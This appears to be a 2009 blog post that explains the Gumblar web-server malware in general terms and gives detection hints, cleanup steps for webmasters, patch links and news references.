According to the IBM Internet Security Systems website, Gumblar is a botnet that infects traditionally non malicious web servers so as to infect the computers of users who have visited infected websites. Gumblar computer virus attacks PCs through vulnerabilities in some versions of the Adobe’s PDF reader and Flash player software.
MODUS OPERANDI :
This virus is a particularly insidious one, with a multi-phased attack. After infecting a machine, Gumblar installs a series of malware programs, including a small application capable of stealing FTP credentials. It can gain control of an entire website and freely operate it.
Gumblar steals FTP passwords from web designers and site manager, then uses them to connect to website servers, and edit .html .php and .js pages. Plus add a few extras too. It targets index files as well as creating files in image directories, and even modifies webalizer and awstats files given the chance. These are likely to be the backdoors. Once Gumblar has infect a webserver, the website on that server becomes a carrier, and spreads the virus to new computers. Anyone browsing to an infected website can pick up the virus. It utilises vulnerabilities in Adome Flash and Adobe Reader so install itself on a pc.Once it infects a PC, the gumblar virus silently redirects the victim’s google search results to websites that injects malwares. Reportedly, the gumblar virus targets google users and the updated version is said to have been tweaked to more efficiently infect users of the Google Chrome browser.
Gumblar also monitors the infected user’s online activity, and waits for the user to conduct Google searches. The malware hijacks the search results, replacing them with any link of its choice and further infecting the computer with malware. The virus also installs a fake antivirus program known as "System Security 2009", and disables any legitimate security software.
DETECTION :
Detection of the gumblar malware may be done by identifying malicious scripts. Web pages that are infected by the gumblar PC virus have a script that looks like this:
Infected websites have their own modification of the script but these modifications have common parts that can be identified as the gumblar . cn script.
REMEDY :
US-CERT has already issued a statement about the Gumblar malware and encourages users to use updated software and antivirus programs.
Unmaskparasites.com provides gumblar remove instructions and recommends scanning for spyware using programs such as the malware removal tool Malware Bytes. Remove all the malicious codes that have been installed in the server files (.html, .php, .js, etc.) and change FTP passwords in a clean computer.
Other remedial actions which the user can take are :
1. Be sure to install updates for Microsoft® products
Use Microsoft Update with automatic updating from the site Microsoft Update.
2. Install the latest versions of Macromedia Flash and Adobe Acrobat Reader.
3. Maintain STRONG Passwords
Use passwords which are ALPHANUMERIC in character and should not be less than 8 characters long.
4. Have strong Antivirus and update them regularly.
5. Avoid unknown links from sites.
PATCHES :
To fix this you could use these patches:
1. For Adobe Reader : http://www.adobe.com/support/security/
2. For Adobe FlashPlayer : http://get.adobe.com/flashplayer/
DETECTION :
Only Antivirus to detect the Virus until a few days ago was AVAST. You could download the latest version at : http://www.avast.com/eng/download-avast-home.html
FIX IT :
Firstly, find another computer that is not infected. Go to your host’s control panel and change the password. If you are running a database driven site, change your database user passwords too. Backup your database – it is not clear at the moment if the database is at risk. Then, the safest option, is to delete everything in your public_html directory (or equivalent) plus html files in the tmp/webalizer and tmp/awstats directories.
On your computer install Avast. Update Windows. If you struggle to get to the website, that’s the virus blocking you. Download from another pc, copy to media, then install from there. Update and run, run in safe mode, clear you temp data (CCleaner has always been handy for this) and run it again. Make sure you pc is clear. Reboot and run again (in case pesky virus hides and returns on reboot). Ah, before doing all that, disable Windows Restore and ensure all restore points are trashed (should be automatic).
When you computer is clear, you should be ok. As a precaution, delete all FTP passwords from all applications (even the ones you forgot about/tested years ago). I suggest that web masters stop saving FTP data on their pc’s completely. Better safe than very very sorry. Remember, Dreamweaver, Link Crawlers and Site Map generators, Photo Editors, Album Creaters and even some notepad tools (like PSPad) store FTP information.
MUST READ THE REPORT :
http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/
REFERENCES :
http://blog.scansafe.com/
http://www.iss.net/threats/gumblar.html
http://www.guardian.co.uk/technology/2009/may/22/gumblar-google-malware
http://www.cbsnews.com/stories/2009/05/29/tech/cnettechnews/main5047992.shtml?source=RSSattr=SciTech_5047992
0 comments:
Post a Comment
To send comments on this Blogsite, you must login with your E-Mail ID and password. I'll receive your comments via E-Mail and will surely try to reply them. Do give your E-Mail Id so that we could be in contact.
You could also post your comments in Hindi. For this, special facility has been provided at the end of this blog.